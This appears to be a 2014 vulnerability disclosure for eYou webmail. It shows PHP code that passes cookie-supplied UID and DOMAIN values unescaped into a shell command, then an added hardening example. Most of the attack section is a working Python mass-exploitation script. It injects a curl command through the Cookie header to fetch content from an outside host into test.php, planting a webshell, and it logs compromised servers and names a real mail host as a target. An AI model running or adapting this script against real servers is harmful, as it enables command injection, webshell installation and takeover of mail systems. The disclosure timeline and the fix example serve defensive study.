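2014-04-26: Details reported to the vendor; awaiting vendor response
2014-04-30: Vendor confirmed; details visible to the vendor only
2014-05-10: Details disclosed to core white hats and experts in the relevant field
2014-05-20: Details disclosed to regular white hats
2014-05-30: Details disclosed to intern white hats
2014-06-10: Details disclosed to the public

This system still has many problems, and even more once you can log in.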
user/storage_fold_explore.php
```php
<?php
/**
 * User network storage directory list
 *
 * This page shows the logged-in mailbox user's network storage directory list;
 * after a directory is selected, mail attachments are saved to it.
 *
 * @author FengHui <[email protected]>
 * @copyright 199902008 eYou.net
 * @version storage_explore.php 2008/11/12
 */
require_once('/var/eyou/apache/htdocs/config.php');
require_once(PATH.'inc/function.php');
require_once(PATH.'inc/libeyou.php');
require_once(PATH.'inc/operate.php');
require_once(PATH.'inc/user.config.php');

$skin = getCookieUserValue('SKIN');
// UID and DOMAIN are read from the client-supplied cookie and passed on unchanged
$uid = getCookieUserValue('UID');
$domain = getCookieUserValue('DOMAIN');
$user_dir_path = getUserDirPath($uid, $domain);
$storage_index_path = $user_dir_path.'/storage/Index/';
$storage_data_path = $user_dir_path.'/storage/Data/';
$file_name = htmlspecialchars(get('file'));
$att = htmlspecialchars(get('att'));
?>
```
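getUserDirPath is defined in /inc/function.php.

```php
function getUserDirPath($uid, $domain) {
    // $uid and $domain are interpolated into a shell command without validation or escaping
    $cmd = "/var/eyou/sbin/hashid $uid $domain";
    $path = `$cmd`; // backticks run $cmd through the shell
    $path = trim($path);
    return $path;
}
```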
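An added example, not eYou's code and not the vendor's patch: one way to harden getUserDirPath() by allow-listing the cookie-derived values and quoting them with escapeshellarg(). The names getUserDirPathSafe and isSafeMailboxPart, the character set and length limits, and the expectation that hashid prints a single line are assumptions; the hashid path is the one shown on the page.

```php
<?php
// Added example (not eYou's code): allow-list validation plus shell quoting.

// Assumed format: UID and DOMAIN use only letters, digits, '.', '_' and '-',
// and start with a letter or digit.
function isSafeMailboxPart($value, $maxLen)
{
    return is_string($value)
        && strlen($value) <= $maxLen
        && preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]*\z/', $value) === 1;
}

function getUserDirPathSafe($uid, $domain)
{
    // Reject values carrying shell metacharacters, whitespace, or a leading
    // '-' (which hashid could read as an option).
    if (!isSafeMailboxPart($uid, 64) || !isSafeMailboxPart($domain, 253)) {
        return false;
    }

    // Defence in depth: quote each argument even though validation passed.
    $cmd = '/var/eyou/sbin/hashid ' . escapeshellarg($uid) . ' ' . escapeshellarg($domain);
    $output = array();
    $status = 1;
    exec($cmd, $output, $status);

    // Assumption: hashid exits 0 and prints exactly one non-empty line.
    if ($status !== 0 || count($output) !== 1) {
        return false;
    }
    $path = trim($output[0]);
    return $path !== '' ? $path : false;
}

// Constructed sample values; only the first pair is well-formed.
$samples = array(
    array('1', '127.0.0.1'),
    array('1|id', '127.0.0.1'),
    array('alice', 'example.com;id'),
    array('-h', 'example.com'),
);
foreach ($samples as $s) {
    $ok = isSafeMailboxPart($s[0], 64) && isSafeMailboxPart($s[1], 253);
    printf("%-8s %-16s %s\n", $s[0], $s[1], $ok ? 'accepted' : 'rejected');
}
```

Callers such as user/storage_fold_explore.php would need to stop processing when the function returns false rather than building storage paths from it.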
Exploit code:
```python
__author__ = 'zengzhang'
import time,sys
import urllib,urllib2
from urlparse import urlparse

def Getwebshell(url):
    url=url.strip()
    header={"Cookie":"USER=UID%3d1|curl http://conqu3r.paxmac.org/test.txt>>test.php&DOMAIN%3d127.0.0.1"}
    try:
        request=urllib2.Request(url,None,headers=header)
        rep=urllib2.urlopen(request)
    except:
        pass
    Indentified(url)

def Readfile(filen):
    fp=open(filen,'r')
    for url in fp:
        if url!='':
            Getwebshell(url)

def Indentified(url):
    url=url[:-19]
    url=url+"test.php"
    try:
        f=urllib.urlopen(url).getcode()
        if f==200:
            fp=open("shell.txt","w+")
            fp.write(url+"\n")
            fp.close()
    except:
        pass

Readfile("url.txt")
```
url.txt contains entries of the form http://mail.bjsasc.com/user/storage_fold_explore.php

You know the rest...
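Severity: High
Vulnerability Rank: 15
Confirmed: 2014-04-30 10:59
This duplicates an earlier report; a patch has already been released. Thanks for the submission!
None at this time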